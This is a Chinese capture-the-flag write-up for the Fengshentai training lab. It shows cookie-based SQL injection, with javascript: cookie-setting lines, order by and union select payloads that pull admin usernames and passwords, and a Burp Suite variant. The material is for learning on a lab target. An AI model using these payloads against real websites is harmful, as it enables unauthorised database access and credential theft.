封神台靶场,为了小芳,冲之——cookie注入

第二个靶场
打开网站封神台靶场,为了小芳,冲之——cookie注入
找一**入点 一般在新闻这种里面点开看看封神台靶场,为了小芳,冲之——cookie注入
先判断是否存在注入封神台靶场,为了小芳,冲之——cookie注入
有waf
尝试了很多方法绕过都没成功,/and/,aandnd,AnD等一系列都没绕过去,乌鸡鲅鱼
删掉id=169 发现封神台靶场,为了小芳,冲之——cookie注入
然后判断cookie注入
在搜索框输入
Javascript:alert(document.cookie=”id=”+escape(‘169’));封神台靶场,为了小芳,冲之——cookie注入
然后弹窗了(其中 “id=” 取决URL中的id= escape中的数值也是URL中id=的值)返回刚刚的页面,把ID删除后一样能正常显示。说明服务器能接收cookie传的id参数。封神台靶场,为了小芳,冲之——cookie注入
然后利用order by 查询字段数
Javascript:alert(document.cookie=”id=”+escape(“169 order by 10”));封神台靶场,为了小芳,冲之——cookie注入
返回后正常封神台靶场,为了小芳,冲之——cookie注入
然后order by 11 返回后页面错误,说明只有10个封神台靶场,为了小芳,冲之——cookie注入
然后利用union select 1,2,3,4,5,6,7,8,9,10 from admin (猜测是admin表)
然后查看回显的位置封神台靶场,为了小芳,冲之——cookie注入
有2,3,7,8,9
然后在对应的位置查询
union select 1,2,3,4,5,6,7,username,password,10 from admin封神台靶场,为了小芳,冲之——cookie注入
Password 有加密 解一下封神台靶场,为了小芳,冲之——cookie注入
我们就知道了 username:admin password:welcome
然后进入后台登录界面封神台靶场,为了小芳,冲之——cookie注入
输入密码登录进去封神台靶场,为了小芳,冲之——cookie注入
成功拿到key

还有另一个方法,利用burp抓包,然后在url中把id=170删除,加在cookie后面,记得用分号隔开,然后看页面是否报错,如果不报错说明存在cookie注入,然后利用查询语句查询即可,查询语句之间用+连接。